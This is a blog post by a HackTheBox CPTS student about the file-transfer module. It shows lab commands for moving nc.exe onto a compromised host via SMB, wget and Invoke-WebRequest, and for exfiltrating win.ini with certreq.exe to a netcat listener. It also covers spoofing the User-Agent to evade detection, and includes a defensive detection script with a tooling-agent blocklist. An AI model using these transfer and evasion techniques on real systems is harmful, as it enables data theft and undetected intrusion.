March Catch Up and Section 4 | File Transfers


It’s been a few weeks since I’ve posted, but I’m happy to report that I’ve kept working on the CPTS modules and am a few ahead of this post at the time of writing, so I’ll be backfilling for a while here with a ton of content that I’ve learned. There was a section after section 3, Information Gathering, titled ‘Vulnerability Assessment’. I’ve decided not to dedicate an entire post to the concept as it’s relatively simple and not as applicable to the CPTS certification exam.

To summarize, vulnerability assessments are largely automated events where a platform or network is scanned via a vulnerability scanner and the output is compiled into some nice visuals, usually in a format that the C-suite and compliance folks can read. There is a lot of value here for sysadmins too, as it will list some common misconfigurations and many vulnerabilities that should be patched. Anyways, onto the meat and potatoes of this post:

File transfers. File transfers are probably the most important part of hacking anything, or at least the most important component of the process. This module covered some methods of transferring files both to and from Windows hosts and UNIX/Linux hosts, ‘living off the land’, and evading detection while doing so. Jumping into it, here are some neat Windows file transfer methods I used during the labs:

I started an SMB server on my attacking machine using impacket, which is a Python library for working with network protocols.

Alecn0@htb[/htb]$ sudo impacket-smbserver share -smb2support /tmp/smbshare -user pwnd -password pwnd

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

After starting the SMB server, you can copy files from the attacking machine to the compromised machine very simply:

C:\htb> net use n: \\10.10.X.X\share /user:pwnd pwnd

The command completed successfully.

C:\htb> copy n:\nc.exe
        1 file(s) copied.

#####
C:\htb> copy \\10.10.X.X\share\nc.exe

        1 file(s) copied.

ezpz. Conversely, with some more tinkering, we can enable upload on the SMB server as well, allowing us to exfiltrate data from the compromised machine to an SMB share on the attack machine. I won’t list that here, as the process is a bit involved and I’m short on time. Onto the Linux section:

Linux has a ton of ways to perform file transfers; the simplest one I used was setting up a Python web server and initiating a transfer via wget:

Attack Machine: 
#Start a webserver
Alecno@htb[/htb]$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

----------------------------------

Compromised machine:

Alecno@htb[/htb]$ wget 10.10.X.X:8000/Upload.txt

--2022-05-20 08:13:05--  http://10.10.X.X:8000/Upload.txt
Connecting to 192.168.49.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/plain]
Saving to: 'Upload.txt'

Upload.txt                       [ <=>                                                                  ]       0  --.-KB/s    in 0s      

2022-05-20 08:13:05 (0.00 B/s) - ‘Upload.txt’ saved [0/0]

This was simple enough, just make sure to start your file server in the same directory as the files you intend to transfer. Again, there’s an inverse, but I’m just demoing some simple things I learned a few weeks ago and don’t want to get too technical.

Living off the Land

This was a really cool section. The term ‘Living Off the Land’ in a hacking context refers to the act of using native tools and binaries to perform actions on a machine. This means initiating file transfers and modifications without downloading a specialized tool to do so. One of the ways taught in the course was to use the CertReq.exe utility to upload a Windows file to a listening netcat connection on our attack machine:

C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)

-------------------------------------

Attack machine:

Alecno_1@htb[/htb]$ sudo nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)
Content-Length: 92
Host: 192.168.49.128:8000

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Essentially, the local certreq.exe tool thinks it’s posting a certificate request when in reality it’s dumping a file to a listening connection on our attack machine. This can be useful when you have limited download/install capabilities or want to be a bit more stealthy. There’s a large project dedicated to living off the land, and there are some excellent resources on LOLBAS for Windows and GTFOBins for Linux.

The last thing I want to talk about in this post is evading detection. Using some of these commands, especially some PowerShell commands, can cause the command to be flagged by DLP/IDS systems or firewalls if the User-Agent is set to something obvious like ‘kali-ftp’ or some other blatantly malicious agent. A neat way to get around this is to either use some of the misplaced-trust binaries mentioned under living off the land or to change the User-Agent:

PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

-------------------------------------

Attack Box: 

Alecn0@htb[/htb]$ nc -lvnp 80

listening on [any] 80 ...
connect to [10.10.10.32] from (UNKNOWN) [10.10.10.132] 51313
GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6
(KHTML, Like Gecko) Chrome/7.0.500.0 Safari/534.6
Host: 10.10.10.32
Connection: Keep-Alive

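From the defender's side, the two netcat captures above (the certreq POST and the Chrome-spoofed Invoke-WebRequest GET) show why a User-Agent blocklist is a weak control. Below is an added example, written for this post rather than taken from the course or from any tool it mentions, that parses raw HTTP requests like the ones netcat printed and scores them on indicators that survive a changed User-Agent: a "NDES client" agent on a host that is not an enrollment server, a POST that declares `application/json` but carries a non-JSON body (win.ini in the capture above), an executable fetched over plain HTTP, and a Host header that is a bare IP. The three captures are reconstructed sample data modelled on the post's output; the IPs, ports and the `kali-ftp` agent are constructed values.

```python
"""Score raw HTTP requests (as printed by a netcat listener) for file-transfer
indicators that do not depend on the User-Agent alone.  Added example; the
captures below are constructed to mirror the post's netcat output."""
import json
import re
from dataclasses import dataclass

# Constructed capture modelled on the certreq.exe POST above (body is win.ini, 92 bytes with CRLF).
CERTREQ_CAPTURE = (
    "POST / HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "Content-Type: application/json\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)\r\n"
    "Content-Length: 92\r\n"
    "Host: 192.168.49.128:8000\r\n"
    "\r\n"
    "; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n"
    "[files]\r\n[Mail]\r\nMAPI=1\r\n"
)

# Constructed capture modelled on the Invoke-WebRequest GET with the Chrome User-Agent.
CHROME_UA_CAPTURE = (
    "GET /nc.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 "
    "(KHTML, Like Gecko) Chrome/7.0.500.0 Safari/534.6\r\n"
    "Host: 10.10.10.32\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed capture with the kind of obvious agent the post says gets flagged.
OBVIOUS_UA_CAPTURE = (
    "GET /nc.exe HTTP/1.1\r\n"
    "User-Agent: kali-ftp\r\n"
    "Host: 10.10.10.32\r\n"
    "\r\n"
)


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


# The naive control: a User-Agent blocklist (sample tokens, not a vendor list).
TOOLING_AGENTS = ("kali", "curl", "wget", "python-requests")
EXECUTABLE_EXT = re.compile(r"\.(exe|dll|ps1|bat|vbs)$", re.IGNORECASE)
BARE_IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def user_agent_only(req: HttpRequest) -> bool:
    """True if a User-Agent blocklist alone would flag this request."""
    ua = req.headers.get("user-agent", "").lower()
    return any(tag in ua for tag in TOOLING_AGENTS)


def indicators(req: HttpRequest) -> list:
    """Return the content-based indicators present in the request, in check order."""
    found = []
    ua = req.headers.get("user-agent", "").lower()
    if any(tag in ua for tag in TOOLING_AGENTS):
        found.append("tooling user-agent")
    # certreq.exe announces itself as an NDES client; outside a real enrollment
    # flow that agent reaching an arbitrary host is worth a look.
    if "ndes client" in ua:
        found.append("certreq/NDES user-agent")
    ctype = req.headers.get("content-type", "")
    if req.method == "POST" and "json" in ctype and req.body:
        try:
            json.loads(req.body)
        except ValueError:  # JSONDecodeError is a ValueError
            found.append("declared JSON body is not JSON")
    if EXECUTABLE_EXT.search(req.path):
        found.append("executable download")
    host = req.headers.get("host", "").split(":")[0]
    if BARE_IPV4.fullmatch(host):
        found.append("Host header is a raw IP")
    return found


if __name__ == "__main__":
    for name, raw in (("certreq", CERTREQ_CAPTURE), ("chrome-ua", CHROME_UA_CAPTURE),
                      ("kali-ftp", OBVIOUS_UA_CAPTURE)):
        req = parse_request(raw)
        print(f"{name:10} ua-blocklist={user_agent_only(req)!s:5} indicators={indicators(req)}")
```

Run as-is, the `kali-ftp` request is the only one the User-Agent blocklist catches, while the content checks flag all three: the certreq POST on its NDES agent and non-JSON body, and the Chrome-spoofed GET on the `.exe` path and bare-IP Host header. The point for detection engineering is to alert on what the transfer does rather than on what the client claims to be.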
There are a ton of things in this module that I couldn’t even touch on, and it’s definitely something that I need to practice and revisit in depth prior to the exam. In the meantime, I think I’m going to complete a couple more of these fundamental modules and then start trying some of the boxes and CTFs on HackTheBox and TryHackMe! I’ll post some walkthroughs of retired machines and some of my CTF/King of the Hill wins and losses once I start getting more into it. Be on the lookout for some more posts over the next week or two and a whole new HackerBox Side Quest soon. Thanks for reading!